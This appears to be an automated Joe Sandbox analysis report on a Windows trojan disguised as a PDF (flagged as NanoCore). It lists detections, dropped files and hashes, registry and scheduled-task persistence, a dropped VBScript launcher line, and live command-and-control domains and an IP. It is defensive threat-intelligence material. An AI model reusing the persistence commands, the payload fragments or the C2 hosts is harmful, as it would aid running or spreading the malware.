      behaviorgraph top1 signatures2 2 Behavior Graph ID: 798041 Sample: 004349256789197.pdf.scr.exe Startdate: 03/02/2023 Architecture: WINDOWS Score: 100 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus detection for URL or domain 2->77 79 Sigma detected: Scheduled temp file as task from temp location 2->79 81 11 other signatures 2->81 10 004349256789197.pdf.scr.exe 40 2->10         started        14 ihgsvw.exe 2 2->14         started        16 wscript.exe 2->16         started        18 6 other processes 2->18 process3 file4 63 C:\Users\user\AppData\Local\...\ihgsvw.exe, PE32 10->63 dropped 91 Starts an encoded Visual Basic Script (VBE) 10->91 20 wscript.exe 1 10->20         started        93 Creates autostart registry keys with suspicious values (likely registry only malware) 14->93 95 Creates multiple autostart registry keys 14->95 22 RegSvcs.exe 14->22         started        24 ihgsvw.exe 16->24         started        26 ihgsvw.exe 18->26         started        28 ihgsvw.exe 18->28         started        30 conhost.exe 18->30         started        32 3 other processes 18->32 signatures5 process6 process7 34 ihgsvw.exe 2 4 20->34         started        38 RegSvcs.exe 24->38         started        40 RegSvcs.exe 26->40         started        42 RegSvcs.exe 28->42         started        file8 61 C:\Users\user\AppData\Local\...\RegSvcs.exe, PE32 34->61 dropped 83 Antivirus detection for dropped file 34->83 85 Multi AV Scanner detection for dropped file 34->85 87 Found API chain indicative of sandbox detection 34->87 89 3 other signatures 34->89 44 RegSvcs.exe 1 11 34->44         started        signatures9 process10 dnsIp11 71 december2n.duckdns.org 212.193.30.230, 49714, 49717, 49719 SPD-NETTR Russian Federation 44->71 73 december2nd.ddns.net 44->73 65 C:\Program Files (x86)\...\dhcpmon.exe, PE32 44->65 dropped 67 C:\Users\user\AppData\Roaming\...\run.dat, data 44->67 dropped 69 C:\Users\user\AppData\Local\...\tmpA401.tmp, XML 44->69 dropped 97 Protects its processes via BreakOnTermination flag 44->97 99 Uses schtasks.exe or at.exe to add and modify task schedules 44->99 101 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->101 49 schtasks.exe 1 44->49         started        51 schtasks.exe 1 44->51         started        53 ihgsvw.exe 44->53         started        file12 signatures13 process14 process15 55 conhost.exe 49->55         started        57 conhost.exe 51->57         started        59 RegSvcs.exe 53->59         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      004349256789197.pdf.scr.exe45%ReversingLabsWin32.Trojan.Lisk
      004349256789197.pdf.scr.exe39%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe100%AviraDR/AutoIt.Gen
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe26%ReversingLabsWin32.Dropper.Generic

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      22.2.RegSvcs.exe.720000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      10.2.RegSvcs.exe.6210000.7.unpack100%AviraTR/NanoCore.fadteDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      december2nd.ddns.net100%Avira URL Cloudmalware
      december2n.duckdns.org100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      december2nd.ddns.net
      		212.193.30.230
      		truetrue
        		unknown
        december2n.duckdns.org
        		212.193.30.230
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          december2nd.ddns.nettrue
          • Avira URL Cloud: malware
          		unknown
          december2n.duckdns.orgtrue
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.autoitscript.com/autoit3/004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              212.193.30.230
              		december2nd.ddns.netRussian Federation
              		57844SPD-NETTRtrue

              General Information

              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:798041
              Start date and time:2023-02-03 17:50:31 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 16m 3s
              Hypervisor based Inspection enabled:false
              Report type:light
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:39
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:004349256789197.pdf.scr.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@43/45@28/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 99.7% (good quality ratio 92.4%)
              • Quality average: 78.8%
              • Quality standard deviation: 29.5%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240s for sample files taking high CPU consumption

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              17:51:58AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              17:52:03Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
              17:52:06Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
              17:52:06API Interceptor1646x Sleep call for process: RegSvcs.exe modified
              17:52:06AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
              17:52:15AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              17:52:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              17:52:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
              17:52:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              17:52:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log

              Download File
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

              C:\Users\user\AppData\Local\Temp\Folder10_51\Update.vbs

              Download File
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):151
              Entropy (8bit):5.088165235670747
              Encrypted:false
              SSDEEP:3:FER/n0eFH5OerbJSRE2J5xAIzbgDU4AdjNerbJSRE2J5xAIzbgRoeqn:FER/lFHIe0i23fzbgDUPjNe0i23fzbg2
              MD5:A9A3C2871C5B661CFE0BD95B12693457
              SHA1:E8C39E23AE2DF49D7D9C461BE91C20FF1B4FDB44
              SHA-256:C64E277FBBCB7B0B7693A0EA11925A1AB3C966723A97A2381851EE269DA571AF
              SHA-512:44B1D4E5CF629E6A91B32721B9B7E2939455DB0ACAEC08DE68E8512CB0C6503BE549E09C3E28E0EAFCB32812B72E398EF471FB39BDF3EF4E15AB3AF58BA63CDE
              Malicious:false
              Reputation:unknown
              Preview:CreateObject("WScript.Shell").Run "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC"

              C:\Users\user\AppData\Local\Temp\Folder10_51\ccmbpoh.docx

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:data
              Category:dropped
              Size (bytes):121649618
              Entropy (8bit):7.0364100465274175
              Encrypted:false
              SSDEEP:196608:NFJK4YyNlildTiCgW6hwsT3mYfb4tMV6zlR5+gmtZtQJYuPng/Kj8nGj3AExAcYc:g
              MD5:004A5D8E43630E4D5DB63A5BB6159FCC
              SHA1:285BD4A523DC7B93B0EFB86978D0FA4591E45D85
              SHA-256:9D5D8B0428D63CC43A9503591D94C62CD1606C26732735A2A950CA63147B367B
              SHA-512:F7756E3FB6B82FB75C53B6CAB6BA5E97B7774ED61F41549E222038FB3C745BD2784FC85D8ECC4DAAD7F09139A73C8E44863BC07E226AF71B4292609774034CD4
              Malicious:false
              Reputation:unknown
              Preview:..;.....?..li....A.m.....E.6...BO....12...R.g.&...T.......W...*D7.24.r....tE.....mX.IU.$..kX...........#.c.s..u.o[x..(+LK.z.....k....CmIV..=m..`r6.[.....2~9Y....I.5....%.0Ld.."YMT.....cEN1....,..m!.j{...9d]..9..`j..Y....-.*.....w...]...v......5.3.H.9.7.3.x.5.8.4.4.1.b.O.5.Q.8.m.X.4.8.2.L.....m.s.A.q.C.q.W.4.6.Z.7.8.3.p.4.0.0.9.4.9.4.1.e.7.6.9.Q.3.1.2.5.E.0.3.1.1.3.4.w.2.1.e.Y.Q.y.u.h.5.......!....S.[.=G..di.~..e4Z...%...s..}9.Z..v.J.."..L......OG.....`.4{[.UZld4..{c..Y...+...wp..gg<$.3......M.K...P.x......h......G..x.E...Jat.....G....!.....!6.o..+...R|.X...#l.. 0...!..8.[.*.Y.......G....5.......r^...\{sH."..rKN......4.1.9.N.4.e.n.d.0.0.h.V.9.C.3.6.4.s.2.T.5.2.9.9.S.3.9.7.p.g.1.7.8.J.8.2.7.Y.l.1.........'@.0...~@...`..i7......&.h.+9yb[m....$...d0.-(.r...ah'.@.....5.i.h.1.d.M.v.N.9.4.N.1.1.3.8.I.0.e.V.d.q.4.K.7.7.5.7.y.M.5.1.0.1.e.3.4.3.8.4.3.....f.K.aX,.D..Lo.+.Z.(6Z0r..!l.yu...0+z\...,...aK..R.....H.=5...o,C..}&n,.h..'..._y...o.#vOo.D.}|.....=.}.]..A...E

              C:\Users\user\AppData\Local\Temp\Folder10_51\cdjr.ktl

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):407473
              Entropy (8bit):4.048588207938584
              Encrypted:false
              SSDEEP:
              MD5:48F9952AAAFE4CA15D39581E78889AC0
              SHA1:569F6FB010FEFB412192A968784DB355B8311853
              SHA-256:7F322D3E2096AA1F60CBF945595F155314D434A4FDD5A35640DF9363570FE666
              SHA-512:BAE18549694F7D75F24D057F21380C30CA6F9C7579EE3D4EAD2F4CAFF92E541797ABFA970688170501DE1EA378B5F0CAF071B46BD7C28030D6C15EFBA5296B87
              Malicious:false
              Reputation:unknown
              Preview:0x4D5*9--3---04---FFFF--_8-------4-----------------------------------08----E/F_*0E-_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24-------5045--4C0/03-*/27E954--------E--E0/0_0/06--C80/--7E0/-----92E70/--2-----2---4--02----2--04-------04--------*-3--02------02-----/--0/----0/--0/------0/-----------038E70/-57----2-2-787*0/-------------------02-0C----------------------------------------------------2---8-----------082--048-----------2E74657874---98C70/--2---0C80/--02--------------2--0602E72656C6F63--0C-----02--02---C*0/-------------4--0422E72737263---787*0/--2-2--7C0/--CC0/-------------4--04----------------074E70/-----48---02-05-E4D6--54/-/-03---CE0/-06CCC4--/8/2------------------------------------------/33-3-5/---0/--//026F35--0*/82E02/62*026F36--0*/E2D0*2606/69//F0*2E332_030*2_F406/69/20*C---330E06/79//F0F3/0706/79//F2032/606/69/20C---0330*06/79/20*8---2E02/62*/72*---033-9-45-------7337--0*/92D28267338--0*/72D26267339--0*/62C242673

              C:\Users\user\AppData\Local\Temp\Folder10_51\cfciwbpw.xl

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):588
              Entropy (8bit):6.213002454543603
              Encrypted:false
              SSDEEP:
              MD5:F821802654AA671984C34C52D1CDCFD4
              SHA1:D4E04EFDB9402CA2090A8602C54B84400ABC71A1
              SHA-256:4BB1B7DE0C409D831CE769B0ACB7ED9F753710B487D3B6135C5758DD0AAFD86C
              SHA-512:8DAB9616753F29F84BAA87012F6FEA6A0185DF12BCE18D334DFF95AC77210EF25680EAD8FC034F60D0EBB40B4D78FA814902F1EE49519E813E9A91FFE3F36AAB
              Malicious:false
              Reputation:unknown
              Preview:.........................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\crldjt.icm

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):524
              Entropy (8bit):6.2118134349266025
              Encrypted:false
              SSDEEP:
              MD5:046256AD551F6765F23E871E20A666A5
              SHA1:79FF6979F39E5DCFA15B81922E947B19B4A4D6B0
              SHA-256:08248EBE1BCE86EA542860C50CCD847580D22CB133A78D524B5D1C714CBBB331
              SHA-512:57BB2D43E8263F6B2F9D37A609940B7BB8B8A0C324451FAA78AD8A35264DA04D3461B58787C3632D7506D2F52D49032B20716FBB8060014FD098FE830F6820BA
              Malicious:false
              Reputation:unknown
              Preview:.......................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\dftbvs.bmp

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):607
              Entropy (8bit):6.201298305828523
              Encrypted:false
              SSDEEP:
              MD5:043E8B1857BEEABA3718A7F3847122D5
              SHA1:7BB750324587EDB34690AA0B789869B15406ECDD
              SHA-256:9524F0E243E06157AFAAD36B50DAF38166331029B5226C16543B2F7AEA1F4E2F
              SHA-512:D7F29E19A3162697D314DD98B3C11E1DDAE2768C79F7E25F96D36D38E5AC2FF0F15BB2DBE9A3F19AADF2430554865099B8F12C9B07C005C8E835CB16FFADA2FA
              Malicious:false
              Reputation:unknown
              Preview:.................................................................................................................6................................................................&................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\fkjavmq.jpg

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):539
              Entropy (8bit):6.206196757309823
              Encrypted:false
              SSDEEP:
              MD5:6E72ACECBCA63A02F17F09893C4ECC5B
              SHA1:B667E4B9DD2659CF40784B523AB6ECAFC715C452
              SHA-256:B6C25984BEEC32852E2AB5E928F7099DE75BAED20852749A603ED89EFC219E63
              SHA-512:E1CF9C9DAA24A5B4099AE18DDB4E6E9B572ED9251E13BE0D804D3A35E9F0171EB4420921CFAB625058744209D9E6604FC370F1B365CDB60ABFFCEF162E366458
              Malicious:false
              Reputation:unknown
              Preview:....................................................................................;...................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\hvwq.msc

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.2074620354651575
              Encrypted:false
              SSDEEP:
              MD5:4BD4541ADFD4E488EACDFF04D29183BE
              SHA1:46FF43B901FE30FC60D07FD8F913BDB9B7C7756D
              SHA-256:0C5F56ABB0BC00576718A0554507D9068FB7E83E4E3B44FE5435371467AD160C
              SHA-512:58E109BC252B51DE3770B5062759158E359D47E51682E66D9E693585BB64E3425D54D3DB4EB3D95B43AE6B2D18F724480594885A363D29CE6DCC9C27436B613F
              Malicious:false
              Reputation:unknown
              Preview:.......................................................................................................................................................................!............................

              C:\Users\user\AppData\Local\Temp\Folder10_51\igkuh.pdf

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):669
              Entropy (8bit):6.256842582335099
              Encrypted:false
              SSDEEP:
              MD5:D20C31B84E18489E4E27B1D5591E9F45
              SHA1:7F6D3CD2F26E1E458C91FA23BB2E489737A6286D
              SHA-256:A8E5BE91B492A1B25ED40D3C9BF20B9CACF662B6C15180A77BF3033C073C292E
              SHA-512:549140F915E92F090AD58571EB544E7D18AB6E4E0D2BEABAF036D95884B12E3FD547474DBF8F793E7691D4D9F1709CF333C41E3D73FFB29791B174D1EF3A122C
              Malicious:false
              Reputation:unknown
              Preview:............................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):1357068
              Entropy (8bit):6.400387425104881
              Encrypted:false
              SSDEEP:
              MD5:797174324A2A71F55AD4E89DA918B52D
              SHA1:0B75AD2A9E182993A220D261F74B68D70F97398A
              SHA-256:AED1188582A5A13FF39A6C9D324BC9A5D0A8CEDB56814B1017CC35D2A6F3548E
              SHA-512:F9A1799F74EF31AB2958463D9557AD3A65D51112F90EC64674DD5675115997019248F5C920E8DEB50A12A90BA2A6EF40D2C5F00C98B3ABD4D3E081866F37B7FC
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 26%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@......................................@...@.......@.........................|....P..4............~..X&...`..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...4....P......................@..@.reloc..Pv...`...x..................@..B................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\itgtrnq.icm

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):578
              Entropy (8bit):6.208581968969855
              Encrypted:false
              SSDEEP:
              MD5:18D244E2DA84E8B08621DB3D2C714ECE
              SHA1:7C03348C271C40E02418075E5678A5906576C280
              SHA-256:592477758051ED96DBCF1300248BD10B1F800287D7E0AFD8012A7D4B446E4C91
              SHA-512:671FEA619563C02F32E0458CE15062BE3F9404A795F763EDEB2934CA0DA24B5487AE721D9CA1B4A5B056E8FB1B8684EF45F7E90519DD6EBF4C90143E01A628E5
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\jdcefmmt.exe

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):701
              Entropy (8bit):6.217263929891554
              Encrypted:false
              SSDEEP:
              MD5:03224F8D3517549E40641731A5211E8D
              SHA1:C9FC0CCFAB73A464DABE64D52737D86ED47DE581
              SHA-256:9FA367942F2C23664CBC8498A334C716F26BF2C1732A5C9490876CBAA3944F6E
              SHA-512:B0E1BE6303B1BB5426F9F0F40AF342544CDD393783F87108B63C5216FAB128FE5AB25561515CECAEE0FA1572A5C8227B08C49E11E18ECFDC08E58A653DE9A743
              Malicious:false
              Reputation:unknown
              Preview:...................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\jvhiixkk.ini

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):549
              Entropy (8bit):6.213056313966432
              Encrypted:false
              SSDEEP:
              MD5:9FFFAA49E0C74C82366B031E8D873414
              SHA1:B71020F66B4D55066C04A5504425649B93DC78F2
              SHA-256:251A281F2856F3CFEC0FD3472028E9ED3AEB5EF558CCAC820EA67C9E8524FE6A
              SHA-512:3E103990CFD5057E9D9B9095805227B226DA59DA4974E237046D1D98653E3C67629DC74C6C0647FFE0A9E8EFAE2F4999E1C2C9EFB2B5C8081879D895CC9A41AA
              Malicious:false
              Reputation:unknown
              Preview:............................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\kcvtlxr.xml

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):620
              Entropy (8bit):6.222206344450024
              Encrypted:false
              SSDEEP:
              MD5:DDC613AF180A41E7B305D2D26E77AED6
              SHA1:682E34C9A6D1A245798B44BE73D47399CBFC60A3
              SHA-256:A0B85CAEE9398B79BB9D7BE632FC2CA14A4E53204A8ECCA296C8CF25C9BAC7F4
              SHA-512:B6A7931AC3281005313641C9D1C3472E4E4646BC63A7B559A6CA911ACD959CF9D07B802E8F919F8DDAA995E61F0B9DEB57BA3C21EE9886D03360C6B1E905E0FB
              Malicious:false
              Reputation:unknown
              Preview:............................................................B........................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\kjwnj.pdf

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):636
              Entropy (8bit):6.245326274571603
              Encrypted:false
              SSDEEP:
              MD5:A70B8C03B325053D2F0A2051E3D566B7
              SHA1:E1A9CB6F876034FCD418A94D1A201DFE26631399
              SHA-256:CA9CD4CDD48DFFDDE0F6418CD08766E00E842634CC615D636540ED30CFD3C433
              SHA-512:8C5F1A8DF42EE671DE09C3D86F1B579B424C4D78E719EF96EE2B88B07DA04FAA1F0F92CDCDE4B4A25A616BD0F6F134A8636C5701E78D3747CBAA9A5F901E2B8B
              Malicious:false
              Reputation:unknown
              Preview:............................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\laklj-aowdkfxknm.xml.vbe

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):46328
              Entropy (8bit):7.200808834838652
              Encrypted:false
              SSDEEP:
              MD5:E3A50ED6D88E9A241C5F8A38C74B75A5
              SHA1:DF2C2FAA8BB5C3D9B14D9A8CDBBF7E86F4F5034A
              SHA-256:E65F26F6FDABF467EE52D7466856CC152B9ECC355596FEBB34E5910413A2CD6D
              SHA-512:4714A1F10420EA1BED67ABA05B4D1E45D48D2BC2944CCCA93F1CB5F7B32F23147D869B6865E4B0A5D703D1F886C650907A4633EBDE9455A84BCC8065DEA18C77
              Malicious:false
              Reputation:unknown
